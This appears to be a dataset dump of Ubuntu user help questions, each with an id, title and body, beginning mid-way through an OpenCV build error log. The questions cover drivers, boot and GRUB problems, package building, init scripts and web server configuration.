/home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1340:52 : warning : ‘int url_fopen ( aviocontext** , const char* , int ) ’ is deprecated ( declared at /usr/include/libavformat/avio.h:316 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1346:5 : warning : ‘int av_write_header ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1676 ) [ -wdeprecated-declarations ] /home/michael/downloads/opencv/opencv-2.1.0/src/highgui/cvcap_ffmpeg.cpp:1346:25 : warning : ‘int av_write_header ( avformatcontext* ) ’ is deprecated ( declared at /usr/include/libavformat/avformat.h:1676 ) [ -wdeprecated-declarations ] make [ 2 ] : *** [ src/highgui/cmakefiles/highgui.dir/cvcap_ffmpeg.o ] error 1 make [ 1 ] : *** [ src/highgui/cmakefiles/highgui.dir/all ] error 2 make : *** [ all ] error 2 i have tried including < stdint.h > in common.h file , but still not working . or maybe i did it wrong when including < stdint.h > file ? please help . this is the make result after running cmake -dwith_ffmpeg=off [ 81 % ] building cxx object apps/haartraining/cmakefiles/createsamples.dir/createsamples.o linking cxx executable ../../bin/opencv_createsamples ../../lib/libhighgui.so.2.1.0 : undefined reference to `cvcreatecameracapture_v4l ( int ) ' collect2 : ld returned 1 exit status make [ 2 ] : *** [ bin/opencv_createsamples ] error 1 make [ 1 ] : *** [ apps/haartraining/cmakefiles/createsamples.dir/all ] error 2 make : *** [ all ] error 2 why is that ?
396207	what can i use ( instead of jupiter ) to control the super hybrid engine on my eeepc 1015t	i 'm running saucy on my eeepc . for a while there was this great tool called jupiter which handled a lot of the power management and cpu scaling on eeepcs . unfortunately , the tool went out of development this summer and has been incompatible with the new version of ubuntu . battery life has been pretty bad with the new version of ubuntu , so is there a way to get all of these power saving functions working with the newest ubuntu version ?
396213	can i call other dpkg or apt-* commands within my preinst scripts ?	as part of my custom ( in-house ) .deb file that will be deployed to ubuntu 12.04 devices , i need to add several ppa repositories , run apt-get update , and then install packages from those ppas . can this be done within the .preinst or .postinst scripts in my .deb file ? i assume that when my .deb file is installed ( sudo dpkg -i testing.deb ) that some locks or mechanisms likely exist which would prevent me from calling certain commands such as add-apt-repository , apt-get update , and apt-get install . is this a correct assumption ?
396215	unable to login into ubuntu one	i ca n't connect to ubuntu one , i 'm getting connectivity problem : fix devices date and time . my phones time and date are managed by my network and i am using a samsung note 3 using the android app .
396216	keeping a clean home folder	i installed n ( node.js version manager ) recently , as well as npm , and node.js . i ca n't tell which program is to blame , but there are tmp , local , share , and bin folders in my home folder as well as a readme and license agreement . this does n't strike me as a clean home folder anymore . am i being overly picky ? or is there something i can do to keep that folder clean ? here 's 3 directories deep on my home folder : . ├── bin ├── costa ├── desktop ├── documents ├── downloads │ ├── photoshop │ └── temp node backup ├── include │ └── node │ ├── openssl │ └── uv-private ├── ingenuity boom │ └── ingenuityboom.com │ ├── node_modules │ ├── public │ ├── routes │ └── views ├── lib │ ├── dtrace │ └── node_modules │ └── npm ├── music │ └── xadjis │ ├── cd1 │ ├── cd2 │ └── cd3 ├── node.js in action │ └── 8th chapter │ ├── newapp │ └── photos ├── pictures │ ├── dad │ ├── memories │ ├── private │ └── webcam ├── public ├── share │ ├── man │ │ └── man1 │ └── systemtap │ └── tapset ├── templates ├── tmp │ └── npm-13722 │ └── 1387898121130-0.8321310367900878 └── videos
396218	script for running exe on all files in different sub folders and for capturing the output in text file	i have an exe file which takes .jpg as input and returns 4 values as output on the console . i have many directories and in each of them i have some images . can you please tell me how to run this exe on all these files and then saving the output in one file ( xls or txt or csv ) ? thanks : )
396221	gnupg , gpg , pgp , gpg4win , openpgp difference	i have some questions . what are differences between terms : gnupg , gpg , pgp , gpg4win , openpgp ? is that algorithm , encryption software or what ? what are differences between them ? what of that terms are algorithms , and what is software ? and with what of these terms we can encrypt files or software ?
396225	huawei e1260 dialer detecting device in 13.04 but not in 13.10	i am facing a similar problem like many others , but yet different . i have the dialer working , but it is not able to detect to device to initialize it . any solutions ? been at it for a few hours . i somehow made it work when i was using 13.04 , but after upgrading to 13.10 recently , it has stopped detecting the device automatically .
396230	no internet access in ubuntu 12.10	i have dell laptop inspiron 3521 , having ubuntu 12.10 with windows 7 . my internet connection works fine in windows 7 but not in ubuntu . help !
396233	internal mic of lenovo ideapad s210 not working	i recently bought a lenovo ideapad s210 and installed ubuntu 13.10 on it . overall it works pretty good , but i ca n't figure out how to get the internal microphone to work . i 've tried adding in lines to the /etc/modprobe.d/alsa-base.conf file as has been suggested in this thread lenovo ideapad built-in mic not working in 12.04 . but still no luck . how to fix this ?
396236	rsync mirror specific ubuntu distributions	how do i mirror specific ubuntu distributions using rsync ? for example , using apt-mirror i would have the following lines so i would only have the package for 12.04 deb ( mirror address ) /ubuntu precise main restricted universe multiverse deb ( mirror address ) /ubuntu precise-security main restricted universe multiverse deb ( mirror address ) /ubuntu precise-updates main restricted universe multiverse deb-amd64 ( mirror address ) /ubuntu precise main restricted universe multiverse deb-amd64 ( mirror address ) /ubuntu precise-security main restricted universe multiverse deb-amd64 ( mirror address ) /ubuntu precise-updates main restricted universe multiverse deb-i386 ( mirror address ) /ubuntu precise main restricted universe multiverse deb-i386 ( mirror address ) /ubuntu precise-security main restricted universe multiverse deb-i386 ( mirror address ) /ubuntu precise-updates main restricted universe multiverse
396237	how to replace the android on a netbook with ubuntu	i have a craig netbook . it has 1 gb of ram and 4 gb of memory . can i run ubuntu in it ? if so please explain the steps i should take .
396240	grub screen upon starting after newly installed ubuntu	i am installing ubuntu 13.10 alongside with win7 . i did not use wubi to install ubuntu . i used a thumbdrive . after installing , i use easybcd to add a new entry . however , the ubuntu boot choice leads to a grub screen saying '' gnu grub version 2.00-19ubuntu2 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . but at this point of time , win7 is still able to be booted . so i tried to find solutions online . then i came across a page that instructed me to do the following : using the thumbdrive to go into the trying version of ubuntu , open terminal , then : mount /dev/sda8 ( where i installed ubuntu ) /mnt grub-install -- root-directory=/mnt /dev/sda and waiting for the installationfinished , no error reported to appear . it said that after i restarted the laptop , ubuntu would load . however , after i restarted , it directly came to the grub screen . and i am desperate . how can i solve this ?
396242	an alternative to init.d ?	is there an alternative to ubuntu 's init.d ? like a way of starting and stopping daemons that do n't require those monstrous init.d scripts : # cat /etc/init.d/skeleton # ! /bin/sh # # # begin init info # provides : skeleton # required-start : $ remote_fs $ syslog # required-stop : $ remote_fs $ syslog # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : example initscript # description : this file should be used to construct scripts to be # placed in /etc/init.d . # # # end init info # author : foo bar < foobar @ baz.org > # # please remove the `` author '' lines above and replace them # with your own name if you copy and modify this script . # do not `` set -e '' # path should only include /usr/* if it runs after the mountnfs.sh script path=/sbin : /usr/sbin : /bin : /usr/bin desc= '' description of the service '' name=daemonexecutablename daemon=/usr/sbin/ $ name daemon_args= '' -- options args '' pidfile=/var/run/ $ name.pid scriptname=/etc/init.d/ $ name # exit if the package is not installed [ -x `` $ daemon '' ] || exit 0 # read configuration variable file if it is present [ -r /etc/default/ $ name ] & & . /etc/default/ $ name # load the verbose setting and other rcs variables . /lib/init/vars.sh # define lsb log_* functions . # depend on lsb-base ( > = 3.2-14 ) to ensure that this file is present # and status_of_proc is working . . /lib/lsb/init-functions # # function that starts the daemon/service # do_start ( ) { # return # 0 if daemon has been started # 1 if daemon was already running # 2 if daemon could not be started start-stop-daemon -- start -- quiet -- pidfile $ pidfile -- exec $ daemon -- test > /dev/null \ || return 1 start-stop-daemon -- start -- quiet -- pidfile $ pidfile -- exec $ daemon -- \ $ daemon_args \ || return 2 # add code here , if necessary , that waits for the process to be ready # to handle requests from services started subsequently which depend # on this one . as a last resort , sleep for some time. } # # function that stops the daemon/service # do_stop ( ) { # return # 0 if daemon has been stopped # 1 if daemon was already stopped # 2 if daemon could not be stopped # other if a failure occurred start-stop-daemon -- stop -- quiet -- retry=term/30/kill/5 -- pidfile $ pidfile -- name $ name retval= '' $ ? '' [ `` $ retval '' = 2 ] & & return 2 # wait for children to finish too if this is a daemon that forks # and if the daemon is only ever run from this initscript . # if the above conditions are not satisfied then add some other code # that waits for the process to drop all resources that could be # needed by services started subsequently . a last resort is to # sleep for some time . start-stop-daemon -- stop -- quiet -- oknodo -- retry=0/30/kill/5 -- exec $ daemon [ `` $ ? '' = 2 ] & & return 2 # many daemons do n't delete their pidfiles when they exit . rm -f $ pidfile return `` $ retval '' } # # function that sends a sighup to the daemon/service # do_reload ( ) { # # if the daemon can reload its configuration without # restarting ( for example , when it is sent a sighup ) , # then implement that here . # start-stop-daemon -- stop -- signal 1 -- quiet -- pidfile $ pidfile -- name $ name return 0 } case `` $ 1 '' in start ) [ `` $ verbose '' ! = no ] & & log_daemon_msg `` starting $ desc '' `` $ name '' do_start case `` $ ? '' in 0|1 ) [ `` $ verbose '' ! = no ] & & log_end_msg 0 ; ; 2 ) [ `` $ verbose '' ! = no ] & & log_end_msg 1 ; ; esac ; ; stop ) [ `` $ verbose '' ! = no ] & & log_daemon_msg `` stopping $ desc '' `` $ name '' do_stop case `` $ ? '' in 0|1 ) [ `` $ verbose '' ! = no ] & & log_end_msg 0 ; ; 2 ) [ `` $ verbose '' ! = no ] & & log_end_msg 1 ; ; esac ; ; status ) status_of_proc `` $ daemon '' `` $ name '' & & exit 0 || exit $ ? ; ; # reload|force-reload ) # # if do_reload ( ) is not implemented then leave this commented out # and leave 'force-reload ' as an alias for 'restart ' . # # log_daemon_msg `` reloading $ desc '' `` $ name '' # do_reload # log_end_msg $ ? # ; ; restart|force-reload ) # # if the `` reload '' option is implemented then remove the # 'force-reload ' alias # log_daemon_msg `` restarting $ desc '' `` $ name '' do_stop case `` $ ? '' in 0|1 ) do_start case `` $ ? '' in 0 ) log_end_msg 0 ; ; 1 ) log_end_msg 1 ; ; # old process is still running * ) log_end_msg 1 ; ; # failed to start esac ; ; * ) # failed to stop log_end_msg 1 ; ; esac ; ; * ) # echo `` usage : $ scriptname { start|stop|restart|reload|force-reload } '' > & 2 echo `` usage : $ scriptname { start|stop|status|restart|force-reload } '' > & 2 exit 3 ; ; esac : openbsd 's rc.d template is a nice example . it uses rc.subr ( 8 ) to simplify things . is there a way to do this in ubuntu ? # ! /bin/sh # # $ openbsd : rc.template , v 1.5 2011/03/10 13:46:59 ajacoutot exp $ daemon= '' $ { trueprefix } /bin/foobar '' # daemon_flags= '' '' # daemon_user= '' root '' . /etc/rc.d/rc.subr # pexp= '' $ { daemon } $ { daemon_flags : + $ { daemon_flags } } '' # rc_bg= # ( undefined ) # rc_reload= # ( undefined ) # rc_pre ( ) { # } # rc_start ( ) { # $ { rcexec } `` $ { daemon } $ { daemon_flags } $ { _bg } '' # } # rc_check ( ) { # pkill -0 -f `` ^ $ { pexp } '' # } # rc_reload ( ) { # pkill -hup -f `` ^ $ { pexp } '' # } # rc_stop ( ) { # pkill -f `` ^ $ { pexp } '' # } # rc_post ( ) { # } rc_cmd $ 1
396243	unable to install ubuntu 12.04 on acer aspire one	i tried installing ubuntu 12.04 on acer aspire one 751h using a live usb . after clicking on install ubuntu the screen goes weird . help !
396252	openbsd packet filter firewall in ubuntu	is there a way to use openbsd 's packet filter firewall in ubuntu ?
396253	timezone error in php.ini on lamp	i am trying to learn soap ( simple object access protocol ) following an example mentioned here downloaded the soap library , including the file lib/nusoap.php which gives a warning which is warning : gettimeofday ( ) : invalid date.timezone value 'utc+05:00 ' , we selected the timezone 'utc ' for now . in /var/www/php-practice/prac/lib/nusoap.php on line 856 i have tried to follow link edited the php.ini and it does no good my region is pakistan and i do not know what to put the timezone for that i tried google which gave me date.timezone ='pakistan time zone ( utc+05:00 ) ' date.timezone ='pakistan' date.timezone ='utc+05:00' i tried all these in php.ini.but non worked for me .
396258	xfce blank screen 13.10	i recently reinstalled ubuntu gnome 13.10 , and installed xubuntu-desktop on the side . with my last installation ( still 13.10 ) everything worked fine . this time , howevere logging into xfce flashes a system error dialogue for a split second before the screen goes completely black . after a few seconds of the blackness , the screen turns the same shade of gray as the gnome login . at this point there is no cursur , and no desktop . the only way to reboot is to alt+f1 and do it from there . i 've tried reinstalling xfce , xubuntu , compiz , to no avail . any help would be much appreciated .
396261	wine wo n't install on fresh ubuntu 13.10 64bit	i am running a fresh install of ubuntu 13.10 saucy on a lenovo thinkpad l512 laptop . when i try to install wine i get the following error : root @ gandalf : ~ # apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . i have followed the instructions at how do i resolve unmet dependencies ? and tried to add the i386 architecture as described at dependency error while installing wine , but neither of these have helped . i also tried apt-get install wine1.4 , but this depends on wine1.4-i386 . i followed the chain of dependencies until i tried apt-get install libudev1 : i386 this wanted to remove 347 packages , including most of ubuntu . naturally i aborted this install . i have also tried adding the wine ppa and installing wine 1.7 , but this gives exactly the same errors . any suggestions ? please ? thanks in advance .
396262	display problem black screen	i have installed ubuntu 12.04lts on my desktop . however , during work , the display suddenly becomes black . as the cursor is moved , it starts displaying the normal background as if it is being painted upon using paint brush . literally , i am able to paint over the black screen fully to get back the normal background and the system works fine for some time before the black screen appears again . if i do not paint also , the normal screen appears back after some time ( probably when the screen refreshes after some time , normality returns ) . i tried changing the screen resolution to a lower resolution however the problem still remains . need help in resolving this issue including steps ( if possible ) for getting update of drivers if necessary .
396263	installing the tomcat7 examples webapp on ubuntu 12.04	i used the sudo apt-get install tomcat7-examples . they were installed in /usr/share/tomcat7-examples/examples directory . tomcat could not locate them from the url : 127.0.0.1:8080/examples/ http status 404 - /examples/ i attempted to copy them to the webapps directory but that failed . $ sudo cp /usr/share/tomcat7-examples/examples/* /var/lib/tomcat7/webapps/examples/ . cp : omitting directory 'jsp ' cp : omitting directory 'servlets ' cp : omitting directory 'web-inf ' what am i missing ? havingsame problem with docs , common , and admin .
396265	convert tuxguitar drum track to addictive drums	the scenario : use tuxguitar in ubuntu 12.04 to compose a guitar track and a drum ( percussion ) track practice song on guitar while listening to tuxguitar play the track ( s ) through the gervill midi port eventually place the drum track on solo and use jack+wine+vsthost to listen to the drum track through the addictive drums 1.0.0 ( vsti ) play guitar along with the drum track as it is plays through addictive drums the problem : the keymap for the drum track in tuxguitar is different than addictive drums keymap for example , 48 in tuxguitar maps to a tom hit , while 48 in addictive drums maps to a hi-hat hit . acknowledgement ( s ) : one could manually go through each drum track in tuxguitar and map each note according to the addictive drums keymap , but then the we have the same problem in reverse , where the drums sound good in addictive drums , but not in tuxguitar . the question : how to convert a tux guitar drum track keymap to an addictive drums keymap in an automated way ? desired solution ( s ) : be able to quickly convert a tux guitar drums track keymap to an addictive drums keymap be able to quickly convert back and forth between the two possible solution ( s ) : write a tuxguitar plugin write some kind of program ( maybe using c++ , java , or php ) to do it i heard newer versions of addictive drums have a guitar pro keymap built in ( so theoretically it will work for tuxguitar if this is true )
396268	could n't load image in opencv ( python )	i installed opencv & python in ubuntu12.04 . i 'm unable to load the image . i tried $ from cv2.cv import * which showed the error '' from : ca n't read /var/mail/cv2.cv '' how to solve this ?
396271	ubuntu 13.10 reboots continuously after installation	i need your expert advice pertaining to ubuntu booting issue . some hardware detail for a better understanding of my problem . netbook is eee pc 900 with 1gb ram and 900mhz . since its hard disks are small in capacity ( 4gh & 8gb ) so i use a 25gb partition of my 60gb western digital usb drive to install and run ubuntu 13.10 . things were going fine until i had to reinstall ubuntu again and this is where problem started . my ubuntu installs like it should but when i restart after installation , my machine just continuously starts rebooting immediately after showing bios screen . whatever i have done since then ( like formatting/data wiping/reinstalling in that partition ) to resolve this issue has yielded no positive result , so please help . regards , arsalan alam
396272	enemy territory - no servers show	i have enemy territory installed on 12.04.3 from the playdeb ppa . it works great , except that no servers show up when i choose to play on the internet . another machine on my home network is installed similarly ( albeit on 13.10 ) and the servers show just fine . i have added `` 91.220.53.73 etmaster.idsoftware.com '' to my /etc/hosts file per this blog : http : //forums.warchest.com/showthread.php/31768-unofficial-server-list-fix but still no joy . also ... similar situation from urban terror , also installed from the ppa . help ? !
396273	how to create a desktop shortcut for a command ?	i use a dongle for using internet on my kubuntu desktop . but to use the dongle , everytime i have to run mobilepartner from /usr/local/airtel/mobilepartner using terminal . is there any way i can create a desktop shortcut for the command above . can a app do it ?
396274	how to install micromax mmx377g in ubuntu 13.04	i am unable to install micromax mmx377g modem in my ubuntu 13.04 . i followed this link : micromax 3g datacard mmx377g installation in ubuntu
396279	combo mic/headphone adapter	from my experience , linux is picky about what you plug into it . my laptop does n't have a mic jack so i am going to be buying a combo , mic/headphone adapter . before i go out and waste time on buying incompatible devices i would like to receive some suggestions on good plug and play adapters for ubuntu 12.10 .
396280	how to revert unity and remove gnome desktop ?	i just installed gnome in ubuntu 13.10 following this article at www.omgubuntu.co.uk after reboot , weird things started happening : gnome desktop always crashes ( hang and unusable ) no mouse cursor in unity and login window mouse scrool act opposite wallpaper is now gone ! even applying new pic as wallpaper did n't solve horrible graphics i am new to ubuntu and now i do n't know how to revert old unity and remove gnome ! how can i solve this ? answer as simple as you can .
396287	allwinner a10 crane board ( mk802+ ) to run ubuntu server	i have an mk802+ android mini pc that i want to run ubuntu server on , and use it as a media client with xbmc . the mk802+ runs on a cortex a8 ( allwinner a10 chipset ) . i downloaded a linaro saucy snapshot rootfs for armhf , and replaced the kernel modules with linux-sunxi sun4i , created boot uimage and uboot and boot.scr . it works , but is highly unstable . the device freezes up for no apparent reason , which leads me to believe the linaro release may not have been the best route . is there an ubuntu 12 or 13 rootfs for armhf ( cross-compiled ) that i can do the same with ? the real question is : is there a downloadable rootfs for omap3 that i can simply download and replace the kernel modules as i did with the linaro rootfs ?
396289	no audio after ubuntu upgrade	i recently updated from 8.04 to 10.4 to 12.04 and now i have no audio -- no audio for video files , no audio when viewing youtube etc on internet , and when i burn/backup , video burns fine , but no audio ... audio is turned all the way up in the audio icon in the top right ( mute is not on ) . computer specifications : dell inspiron 1420 intel core 2 duo t5550 ( 3gb , ddr2 , 667mhz )
396298	playing movies on tv	i have a notebook under ubuntu 12.04 lts and two sony tvs with built-in wifi modules . how can i play videos i have on my notebook 's hard drive to tv ? i easily do so with my android smartphone using kx player as a dlna player and sony tv as a rendering device . is there any similar player for ubuntu ? please note i do n't want to use tv remote control unite to surf over my local wifi network to connect to any media servers ( on my notebook in particular ) and then to select movie to play . i am looking for ubuntu application which allows to browse local wifi network and select found tvs as rendering devices and then just to play video on these tvs . in other words , something like window media player with `` play to ... '' function . thank you !
396300	lost windows 7 after installing ubuntu	when i installed ubuntu along with windows 7 , there was no option of installing ubuntu alongside windows 7 so i selected the something else option . now when i start my computer , in the grub there is no option for windows , only linux options . there is no sign of windows 7 on my computer . no files of windows 7 in the ubuntu . i just want my windows 7 back now . at this point i do not care about ubuntu . i may have done some wrong partitioning during installation of ubuntu . please help . ( my ubuntu version is 12.04 )
396301	how to build source package with `pbuilder` for ppa upload ?	i am trying to use pbuilder to upload to ppa . package builds ok with the command : sudo pbuilder build < package > _ < version > .dsc but upload fails with error : source/binary ( i.e . mixed ) uploads are not allowed . it is said that i need to use pdebuild to build source package , but pdebuild does n't resolve build dependencies . how can i build this package , so it can be finally uploaded ? i do n't want to install dependencies manually .
396302	how to enable the drivers for beats audio spekers for hp envy dv6 ?	i recently shifted to ubuntu . i am very happy to be a part of ubuntu family , but now i have a problem . that is beats audio speakers in the my laptop are not working . i am using hp envy dv6 laptop . so plzz help me to solve this problem
396304	grub shows no entry for windows xp	i installed ubuntu on the e : \ drive using a usb drive boot . i do not see any windows xp option in the grub . i did boot-repair ( os-prober does not show any other os ) and below is the link to the boot info summary report . please help me as i do not want to install my data on windows . http : //paste.ubuntu.com/6644322/
396309	how to unlock the boot partition in gparted	first of i am a total noob in ubuntu and have never used a linux-based system before . just to give you an image of how little knowledge i have : i am at the point where i am trying to understand the `` terminal '' concept . i 've used it to install programs and type in certain commands . to the question : i bought a notebook that had ubuntu installed and right now i am trying to create a windows partition . i got gparted running , but unfortunately my boot partition is somehow locked ( there 's a key symbol in front of the name ) . i 'd like to unlock it and format it to ntfs . the 3 installed partitions are : dev/sda1 ... fat32 ... 10gib ... hiden , lba ... ... ... ... ..unlocked- > i could format this one dev/sda2 ... ext4 ... 452.16gib ... boot ... ... ... ... ... ..locked- > this one i 'd like to format to ntfs dev/sda3 ... linux-swap ... 3.6 gib i tried to format it from the windows cd , but the `` format '' option was locked . i treid the command line : umount /dev/sda2 as root , but only got back : umount : / : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) thx 4 the help !
396310	wifi adapter not working on benq joybook s46	i installed ubuntu 13.10 on my laptop . the wifi adapter is not working yet . i tried to turning on the adapter by clicking fn+f12 , but the adapter is still not working yet .
396313	ubuntu live 12.04.3 x64 skip installation screen	my laptop 's internal hdd broke a week ago and now it wo n't boot ( or do anything ) from it . so i made a live stick since i only use the computer for surfing and watching bluray . note : the stick has been created with linux live usb creator , inclusive persistent mode so i can customize the live stick . everything is fine except at the start of ubuntu when there pops up a window `` install '' with two buttons `` try ubuntu '' and `` install ubuntu '' . when i close it or click on try , nothing happens for 1 minute and then the desktop appears . it 's really annoying when the screen comes up after 10 seconds and then needs another 50 or so ... ( how ) can that be skipped ?
396316	configure lighttpd to download some files and to open other files in browser	i have a plain/text file '' getnodeid '' i want to display its contents on web browser , so i use mimetype.assign = ( `` '' = > `` text/plain '' , `` text '' = > `` text/plain '' `` .jnlp '' = > `` application/x-java-jnlp-file '' ) when i enter **http : //10.78.161.79/getnodeid** in my browser , the text is displayed in my browser . the problem is when i enter **http : //10.78.161.79/index.jnlp** in my browser , it displays its content in browser , but here i want to run this file in browser . now it displays every file in the browser . i want that the browser should run index.jnlp . instead of displaying its contents . i can not change getnodeid to getnodeid.text . how can i tell in lighttpd.conf to download a files or to dispaly its content in browser . plz help
396320	can not format or create partition table for flash drive	i got usb flash drive which i can not format in win xp or win 8.1 . that 's what gparted on ubuntu says : when i try to create new partition with gparted it says : no partition table found on device /dev/sdb/ so i try to create msdos partition table but it says : input/output during write on /dev/sdb this was working flash drive few days ago , when i formatted it few times and created new partition table due to some problems , but now it seem i can not do anything . how to fix this ?
396321	ca n't find driver for kyocera taskalfa 180 gx	not able to find driver for kyocera taskalfa 180 gx for ubuntu . any advice ?
396326	how to view system startup and shutdown information	ever since i repartitioned my logical drive using `` disks '' application in ubuntu 13.10 , i keep on getting some error messages at system startup and shutdown . but those are too fast to read . also , now when i shutdown my system , it does n't shuts down but instead goes into a halt state . is there any way to properly read those error messages ? does the log file records them ? if yes , what keywords should i search for to locate those events and the information regarding them in the log file ? thank you .
396327	login screen do not enter power saving mode on 13.10	since i upgraded to 13.10 my login screen does not enter power save mode : the screen is always on . power saving works normally inside a session . where can i set power saving parameters for the login screen ?
396332	unblacklist `` option '' module on ubuntu 13.10	i am using a usb mobile broadband . this is lsusb output : bus 002 device 002 : id 12d1:140c huawei technologies co. , ltd. e180v it come with dashboard that i was using for sending text messages . then i decided that i do n't need it anymore and uninstalled it with included uninstall script . when i executed that script i got this error message : fatal : module option is in use . i was not realize that `` option '' module is needed to detect usb modem . so after some search i decided to blacklist that module on /etc/modprobe.d/blacklist and then sudo update-initramfs -u now my usb modem is not detected ( ubuntu 13.10 ) and ls -l /dev/ttyusb* gave no result . i 've tried to delete entry on /etc/modprobe.d/blacklist and even deleted that file and updating initramfs . also i tried to load module by using sudo modprobe option but they all are not working . the weird thing is that if i boot to opensuse first then later reboot to ubuntu `` option '' module is loaded and i can use my modem just like before .
396334	ca n't shut down the computer . it only reboots	sudo halt -p makes a reboot sudo halt stops but not power off sudo shutdown -r now reboots . based on the advice from bug # 985471 , i modified /etc/default/grub , changing grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' reboot=pci quiet splash '' and i have installed laptop-mode-tools , but can not power off the computer reboot always . 3.8.0-35-generic ( # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 ) / xorg:1.13.3 ( 16 october 2013 04:46:41pm ) can anyone help me to shutdown my pc completely ?
396337	ubuntu 12.04 applications places	all of a sudden , ubuntu on dell vostro 2520 in two nights messed the '' applications places '' menu . first , it vanished the private entry totally . and due that , all of its members . fb youtube tried to fix that it with several hints , no help . even the facebook entry is not working at all . of course those can be used via firefox cooler would be it to use direct from the menu . any similar experiences ? i have n't hacked my ubuntu at all , the os came as an initial os installation from dell . to keep it simple , possible to get the `` original '' applicatopsn places from somewhere ? i do think , that that is just pure basics .
396339	ubuntu installer missing packages	i 'm net booting the precise installer from a pxe server and serving packages from the iso image over http . i setup my pxe using the netboot files from the same iso image , which i downloaded from ubuntu . during the installation the installer is trying to retrieve files that do not exist on the iso image . i can see this in the installer log terminal , as well as in the apache access log . for example : '' get /isomount/pool/main/l/linux-firmware/scsi-firmware_1.79.7_all.udeb http/1.1 '' 404 326 is this expected ? i 'm fairly new to ubuntu , so may be i 'm missing something here . is n't the idea behind having an offline media for installation is for such a media to provide a complete installation ?
396343	problems with sudo inside shell script	i want to make a shell script to run vi with sudo if i try to edit a file that i do n't have write permissions and for that i created an alias alias vi=my_script.sh # ! /bin/bash file= $ 1 if [ -r $ file ] then /usr/bin/vi $ file else sudo /usr/bin/vi $ file fi however , no matter what , when try to edit , let 's say /etc/hosts , i still not being allowed to edit it . what am i doing wrong ?
396346	ubuntu 12.04 boots to login screen but ( i think ) x.org crashes on login . help appreciated !	i 've been running ubuntu 12.04 since it 's debut in 2012 without a single problem . today i just ran sudo apt-key update & & sudo apt-get update and then i rebooted my computer . after rebooting however , it first shows the ubuntu bootscreen ( with the ubuntu logo and the dots below it ) after which it booted to the command line . i could login and navigate around on the command line , but no gui was loaded at all . so i tried running sudo startx , but this gave a message saying ( among others ) the following : nvidia : api mismatch : the nvidia kernel module has version 304.88 , but this nvidia driver component has version 304.108 . please make sure that the kernel modle and all nvidia driver components have the same version . i found this thread which suggested to do : sudo service lightdm stop # to stop the xserver sudo apt-get remove -- purge nvidia* # to remove all driver elements sudo apt-get update sudo apt-get install nvidia-current sudo reboot after doing this , it now boots to the login screen where it seems that there are now two users named kramer65 on my computer . one of the two has the default ( instead of my personal ) background and says my password is incorrect . the other one seems to be my `` real '' account and when i type my password it seems to try to show the desktop . instead however , it shows a black screen after which i think x.org crashes , because it loads the login screen again . so i guess the nvidia driver is still not okay , or maybe there is something wrong with the duplicate accounts ( both with a username kramer65 ( but i guess it 's the nvidia driver ) . does anybody know what else i can do from here ? all tips are welcome ! [ edit ] the strange thing is that i can actually login using the guest account , so i do n't understand whats wrong with the specific kramer65 user login .
396347	`` missing update command '' ubuntu/android dual boot app	i 'm using the android app to dual boot ubuntu touch and android 4.4.2 stock on a nexus 10 . after the app downloads the required files it goes to install them but gets the error can not accses /cache/system/-no file or directory ( 2 ) missing update command how to solve this ? ok so i did what u said and i still get the same error so i tried manually adding a system folder to the cache directory and this time i got a different error that occurs after it creates the swap space . the error is '' missing update command '' again
396350	mounting /rofs of liveusb as rw partition , possibility ? how ?	so what i know from what i see , the liveusb root directory reside on /rofs partition , and what i know it 's a file named filesystem.squashfs and use loop partition table so basiclly it 's an system image mounted as read-only , and the question is ... . it is possible to automount it as read/write partition ? and how ?
396353	upgrade from 12.04 to 12.1 boots to power saver mode and everything is dark	i upgraded from 12.04 to 12.10 with no issues , however , when the system was rebooted , it immediately came up in power saver mode , the screen is black and i 'm unable to do anything , especially get it out of that mode . i downgraded back to 12.04 and everything seems to be back to normal , sort of . there are issues with the downgrade , but i wo n't get into those here . i would however like to understand why 12.10 goes into power saver mode on boot . previous answer to this post says the problem is fixed but does n't supply the solution . whatever it is , it needs to be brought forward into 12.10 . suggestions ?
396355	ubuntu 12.04 installation fails	i am trying to install elementaryos on my lenovo u410 , although the same problem appears on ubuntu 12.04 too . the installation works fine , i can choose partitions , create a user and so on , but finally the installation stops and i get an error message saying that the 'grub-efi ' package failed to install into target . i tried different approaches , but always installed root on the 24 gb ssd , and home on the 1tb hdd . using boot mode 'uefi only ' , the screen stays black after pressing 'install elementary ' . when i choose 'legacy support ' , i get the error message i mentioned above . after that , i tried the approach that is described here . it basically says that one should convert the hdd from gpt to mbr partition table , so i did this using gparted in live mode using my elementaryos boot stick , but i still get the same error message . how can i fix this problem ?
396356	computer enters a reboot loop after ubuntu installation using wubi	i tried installing ubuntu in a hardrive different from the hard drive where my win7 is installed . i formatted the drive and re-partitioned it . i used the wubi.exe , but after the boot menu went up , when i tried loading ubuntu it started going , but then the mouse keyboard and screen stopped getting signal , and the whole thing rebooted back to the boot menu . if afterwards i tried loading the win7 . it went up but the mouse and keyboard did n't work . this just kept going until i went into the bios and disabled the port of the hardrive where ubuntu was installed .
396359	edimax ew-7811un wireless adapter no longer works in 12.04	upgraded ubuntu from 12.04 to 12.1 . 12.1 booted to power saver mode and screen went black ; unable to log in or do anything ( have another post asking about this issue ) . downgraded back to 12.04 and edimax ew-7811un no longer works . it was originally working fine before upgrade/downgrade . suggestions ?
396360	recovery dvd with more than 1 linux recovery tool	i may have a difficult question . i want to make a ultimate recovery dvd with clonezilla , bootrepair , ubuntu livedvd and maybe some other tools . my question is how to make the boot so i can choose to boot in 1 of the repair tools ? the reason why i want to have such sort dvd is because it is handy to have 1 dvd with multiple recovery tools on it .
